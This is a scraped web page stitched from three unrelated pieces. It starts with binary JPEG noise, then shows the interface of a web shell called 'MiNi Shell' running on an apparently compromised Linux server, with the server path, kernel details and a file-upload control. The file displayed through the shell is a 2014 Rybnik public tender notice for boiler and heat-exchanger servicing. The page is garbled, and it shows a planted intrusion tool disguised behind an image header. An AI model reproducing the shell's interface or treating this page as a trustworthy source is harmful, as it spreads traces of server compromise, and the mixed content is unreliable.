JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140306/48107-N-2014.html

<p class="kh_header"><b>Rybnik: Zad. 1. Prowadzenie serwisu urządzeń kotłowni wraz z zasobnikiem ciepłej wody w budynku administracyjnym Zakładu Gospodarki Mieszkaniowej  w Rybniku przy ul. Patriotów 32.
Zad. 2. Prowadzenie serwisu urządzeń kotłowni, węzłów wymiennikowych  w budynkach administrowanych przez Zakład Gospodarki Mieszkaniowej w Rybniku.</b><br>
<b>Numer ogłoszenia: 48107 - 2014; data zamieszczenia: 06.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki  Mieszkaniowej w Rybniku , ul. Kościuszki 17, 44-200 Rybnik, woj. śląskie, tel. 32 422 12 47, faks 32 4221247.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgm.rybnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zad. 1. Prowadzenie serwisu urządzeń kotłowni wraz z zasobnikiem ciepłej wody w budynku administracyjnym Zakładu Gospodarki Mieszkaniowej  w Rybniku przy ul. Patriotów 32.
Zad. 2. Prowadzenie serwisu urządzeń kotłowni, węzłów wymiennikowych  w budynkach administrowanych przez Zakład Gospodarki Mieszkaniowej w Rybniku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia objętego niniejszym postępowaniem jest prowadzenie serwisu urządzeń kotłowni, węzłów wymiennikowych w budynkach administrowanych przez Zakład Gospodarki Mieszkaniowej w Rybniku.
Zamówienie zostało podzielone na dwa zadania.
Szczegółowy opis przedmiotu zamówienia zawiera SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.53.11.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgm.rybnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Mieszkaniowej, Dział Zamówień Publicznych i Umów, ul. Kościuszki 17, 44-210 Rybnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2014 godzina 09:00, miejsce: Zakład Gospodarki Mieszkaniowej, Dział Zamówień Publicznych i Umów, ul. Kościuszki 17, 44-210 Rybnik.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prowadzenie serwisu urządzeń kotłowni wraz z zasobnikiem ciepłej wody w budynku   administracyjnym Zakładu Gospodarki Mieszkaniowej  w Rybniku przy ul. Patriotów 32.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie serwisu urządzeń kotłowni wraz z zasobnikiem ciepłej wody w budynku   administracyjnym Zakładu Gospodarki Mieszkaniowej  w Rybniku przy ul. Patriotów 32.
Kotłownia gazowa: 
- 1 kocioł gazowy De Dietrich o mocy 65 kW, model MCA 65, numer seryjny 1330507971400 
- 1 zasobnik ciepłej wody o poj. 300 l - 1,0 MPa.

1. Zakres usług obejmuje następujące prace:
1)	bieżącą konserwację;
2)	cykliczne czyszczenie pieca i palników wraz ze wzrastającym zanieczyszczeniem,
3)	regularną i fachową konserwację instalacji grzewczej gwarantującą bezusterkową,  energooszczędną i przyjazną dla środowiska naturalnego eksploatację,
4)	cykliczne sprawdzanie ciśnienia w instalacjach - dopełnienie wody,
5)	sprawdzenie działania zaworów bezpieczeństwa,
6)	sprawdzenie działania urządzeń regulacyjnych i zabezpieczających,
7)	prowadzenie procesu legalizacji układów detektorów gazowych,
8)	sprawdzenie i ewentualne doszczelnienie wszystkich uszczelek poprzez uzupełnienie szczeliwem,
9)	sprawdzenie instalacji nawiewnej i wywiewnej powodującej prawidłową pracę urządzeń   grzewczych,
10)	 zgłaszanie usterek oraz szybkie ich usuwanie,
11)	 zgłaszania potrzeb remontowych wynikłych w trakcie eksploatacji,
12)	 sporządzanie wykazu części zamiennych,
13)	 prowadzenie rozruchów jesiennych oraz wiosennych, uzależnionych od warunków pogodowych,
14)	 utrzymanie w czystości urządzeń grzewczych i kotłowni,
15)	 każdorazową obecność należy udokumentować w zeszycie kontroli kotłowni oraz krótkim opisem przeprowadzonych czynności z podaniem daty, czytelnym podpisem serwisanta i firmową pieczątką.
Wykonawca zapewni wykonanie usługi przez osobę posiadającą kwalifikacje uprawniające do zajmowania się eksploatacją urządzeń i sieci gazowych, elektrycznych i cieplnych grupy 1, 2, 3 na stanowisku dozoru i eksploatacji.
Przeglądy i konserwację urządzenia gazowego może wykonać wyłącznie firma serwisu gwarancyjnego De Dietrich bądź autoryzowana przez De Dietrich firma instalacyjna w celu dotrzymania warunków gwarancji zamontowanego urządzenia gazowego (kotła).
2. Usługi muszą być wykonane zgodnie z obowiązującymi przepisami, normami oraz na ustalonych niniejszą umową warunkach. Wykonawca jest odpowiedzialny za przestrzeganie przepisów BHP podczas realizacji zadania.
3. Prowadzenie serwisu urządzeń kotłowni w budynku administracyjnym obejmuje wszystkie dni   kalendarzowe danego miesiąca w okresie objętym serwisem.
4.  W przypadku wystąpienia awarii kotłowni Wykonawca zobowiązany jest zareagować do 1 godziny od chwili zgłoszenia awarii przez osobę upoważnioną ze strony Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie serwisu urządzeń kotłowni, węzłów wymiennikowych  w budynkach administrowanych przez Zakład Gospodarki Mieszkaniowej w Rybniku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie serwisu urządzeń kotłowni, węzłów wymiennikowych w budynkach administrowanych przez Zakład Gospodarki Mieszkaniowej w Rybniku, prowadzenie eksploatacji kotłowni przy ul. Raciborskiej 260 oraz wykonanie protokołu przeglądu technicznego kotłowni przy ul. Hetmańskiej 5.
1. Usługa obejmuje następujące adresy:
a)  kotłownie gazowe (serwis):
    - ul. Kolejowa 38 	    	2 kotły o mocy 70 kW każdy,                            
    - ul. Mikołowska 29       	1 kocioł gazowy o mocy 110 kW,                  
    - ul. Rynek 1                  	1 kocioł o mocy 49 kW,            
    - ul. Orzepowicka 8d 	1 kocioł o mocy 8,5 kW
b) kotłownia olejowa (serwis, eksploatacja):
    - ul. Raciborska 260        1 kocioł o mocy 150 kW,
Zakres usług obejmuje następujące prace [dot. punktu a) i b)]:
1)	bieżącą konserwację,
2)	cykliczne czyszczenie pieca i palników wraz ze wzrastającym zanieczyszczeniem,
3)	regularną i fachową konserwację instalacji grzewczej gwarantującą bezusterkową, energooszczędną i przyjazną dla środowiska naturalnego eksploatację,
4)	cykliczne sprawdzanie ciśnienia w instalacjach - dopełnienie wody,
5)	sprawdzenie działania zaworów bezpieczeństwa,
6)	sprawdzenie działania urządzeń regulacyjnych i zabezpieczających,
7)	prowadzenie procesu legalizacji układów detektorów gazowych,
8)	sprawdzenie i ewentualne doszczelnienie wszystkich uszczelek poprzez uzupełnienie szczeliwem,
9)	sprawdzenie instalacji nawiewnej i wywiewnej powodującej prawidłową pracę urządzeń grzewczych,
10)	zgłaszanie usterek oraz szybkie ich usuwanie,
11)	zgłaszanie potrzeb remontowych wynikłych w trakcie eksploatacji,
12)	sporządzanie wykazu części zamiennych,
13)	prowadzenie rozruchów jesiennych oraz wiosennych, uzależnionych od warunków pogodowych,
14)	utrzymanie w czystości urządzeń grzewczych i kotłowni,
15)	każdorazową obecność należy udokumentować w zeszycie kontroli kotłowni i wymiennikowni z krótkim opisem przeprowadzonych czynności z podaniem daty oraz czytelnym podpisem serwisanta,
oraz dodatkowo usługi dla kotłowni przy ul. Raciborskiej 260:
1)	prowadzenie eksploatacji pod kątem utrzymania temperatur wewnętrznych nie niższych niż w zakresie od +5 0C do +100C  w 5 wybranych pomieszczeniach i wykonanie obowiązkowej kontroli: 
 dla temp. zewn. powyżej 00C		- 1 raz w tygodniu 
       dla temp. zewn. od  00C do -50C		-2 razy w tygodniu
       dla temp. zewn. od - 50C do -200C		- 3 razy w tygodniu,
2)	odczyt powyższych pomiarów powinien być dokonywany w pomieszczeniu kotłowni oraz zanotowany w zeszycie kontroli ( przekaz informacji z czujników temperatur może być przekazywany drogą przewodową lub bezprzewodową do pomieszczenia kotłowni. Koszt montażu czujników ponosi wykonawca),
3)	Zamawiający zapewni paliwo - olej opałowy.
Wykonawca zapewni wykonanie usługi przez osobę posiadającą kwalifikacje uprawniające do zajmowania się eksploatacją urządzeń i sieci gazowych, elektrycznych i cieplnych:
grupy 1 - na stanowisku dozoru (D) i na stanowisku eksploatacji (E)
grupy 2 - na stanowisku dozoru (D) i na stanowisku eksploatacji (E)
grupy 3 - na stanowisku dozoru (D) i na stanowisku eksploatacji (E).
c) węzły wymiennikowe (serwis):
 - ul. Orzepowicka 8d 1 wymiennik o mocy 50 kW,
- ul. Białych 7  1 wymiennik o mocy 407 kW,          
- ul. Chrobrego 39 1 wymiennik o mocy 150 kW,
- ul. Sportowa 115  1 wymiennik o mocy 195 kW,   
- ul. Andersa 8, 1 wymiennik ciepła  o mocy 61kW,
- ul. Rymera 42 1 wymiennik c.w.u o mocy 25 kW,           
- ul. Barbary 19, 1 wymiennik c.w.u o mocy 18 kW,
- ul. Poligonowa 13 1 wymiennik kompaktowy ciepła c.o. i c.w.u. o mocy 400 kW,
- ul. Poligonowa 15 1 wymiennik kompaktowy ciepła c.o. i c.w.u. o mocy 300 kW,
- ul. Poligonowa 17 1 wymiennik kompaktowy ciepła c.o. i c.w.u. o mocy 300 kW,
- ul. Rudzka 13 budynek CUTI	 1 wymiennik o mocy 85 kW,
Zakres usług obejmuje [dot. punktu c)]: 
1)bieżącą konserwację,
2)cykliczne sprawdzenie ciśnienia w instalacjach - dopełnienie wody,
3)sprawdzenie działania zaworu bezpieczeństwa,
4)sprawdzenie działania urządzeń regulacyjnych,
5)sprawdzenie i ewentualne doszczelnienie wszystkich uszczelek poprzez uzupełnienie szczeliwem,
6) zgłaszanie usterek oraz szybkie ich usuwanie,
7) zgłaszanie potrzeb remontowych wynikających w trakcie eksploatacji,
8) sporządzenie wykazu części zamiennych,
9)prowadzenie rozruchów jesiennych, wiosennych oraz uzależnionych od warunków  pogodowych,
10)utrzymanie w czystości urządzeń grzewczych oraz wymiennikowi,
11)każdorazową obecność należy udokumentować w zeszycie kontroli kotłowni z krótkim opisem przeprowadzonych czynności z podaniem daty oraz czytelnym podpisem serwisanta
oraz dodatkowe usługi dla wymiennikowni ZSW CUTI ul. Rudzka 13:
1)prowadzenie eksploatacji pod kątem utrzymania temperatur wewnętrznych nie niższych niż od +5 0C do + 100C  w 5 wybranych pomieszczeniach i wykonanie obowiązkowej kontroli: 
dla temp. zewn. powyżej 00C	- 1 raz w tygodniu
dla temp. zewn. od  00C do -50C - 2 razy w tygodniu 
dla temp. zewn. od - 50C do -200C	- 3 razy w tygodniu
2)odczyt powyższych pomiarów powinien być dokonywany w pomieszczeniu kotłowni oraz  zanotowany w zeszycie kontroli ( przekaz informacji z czujników temperatur może być przekazywany drogą przewodową lub bezprzewodową do pomieszczenia kotłowni. Koszt montażu czujników ponosi wykonawca).
Wykonawca zapewni wykonanie usługi przez osobę posiadającą kwalifikacje uprawniające do zajmowania się eksploatacją urządzeń i sieci gazowych, elektrycznych i cieplnych:
grupy 1 - na stanowisku dozoru (D) i na stanowisku eksploatacji (E)
grupy 2 - na stanowisku dozoru (D) i na stanowisku eksploatacji (E)
grupy 3 - na stanowisku dozoru (D) i na stanowisku eksploatacji (E) 
d) wykonanie protokołu przeglądu okresowego kotłowni w budynku przy  ul. Hetmańskiej 5 (kotłownia węglowa) -  2 kotły (1 kocioł o mocy 250 kW, 1 kocioł o mocy 260 kW).zgodnie z Ustawą Prawo budowlane z dnia 7 lipca 1994r. (t.j. Dz. U. z 2013 r. poz. 1409, art 62 ust 1 pkt 5 lit. a).
Zakres usług obejmuje:
1)ocenę techniczną pieca oraz jego zanieczyszczenia,
2)ocenę energooszczędnej i przyjaznej dla środowiska eksploatacji,
3)określenie sprawności działania zaworów bezpieczeństwa,
4)ocenę sprawności działania urządzeń regulacyjnych,
5)określenie prawidłowości spalania,
6)sporządzenie protokołów z przeglądów określających ich dalszą przydatność do eksploatacji.
Wykonawca zapewni wykonanie usługi przez osobę posiadającą kwalifikacje uprawniające  do zajmowania się eksploatacją urządzeń i sieci gazowych, elektrycznych i cieplnych:
grupy 1 - na stanowisku dozoru (D) i na stanowisku eksploatacji (E)
grupy 2 - na stanowisku dozoru (D) i na stanowisku eksploatacji (E).
Sporządzenie protokołu przeglądu technicznego kotłowni nastąpi po sprawdzeniu stanu technicznego kotła z uwzględnieniem efektywności energetycznej kotła oraz jego wielkości do potrzeb użytkowych.
2.Usługi muszą być wykonane zgodnie z obowiązującymi przepisami, normami oraz na ustalonych niniejszą umową warunkach. Wykonawca jest odpowiedzialny za przestrzeganie przepisów BHP podczas realizacji zadania.
3. Prowadzenie serwisu urządzeń kotłowni oraz węzłów wymiennikowi w budynkach administrowanych obejmuje wszystkie dni kalendarzowe danego miesiąca w okresie objętym serwisem.
4.  W przypadku wystąpienia awarii kotłowni lub węzła wymiennikowi Wykonawca zobowiązany jest  zareagować do 1 godziny od chwili zgłoszenia awarii przez osobę upoważnioną ze strony Zamawiającego.
5.  Ilość budynków objętych serwisem może ulec zmniejszeniu w trakcie trwania umowy w przypadku przekazania innemu podmiotowi budynku, w którym znajduje się kotłownia lub węzeł wymiennikowi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com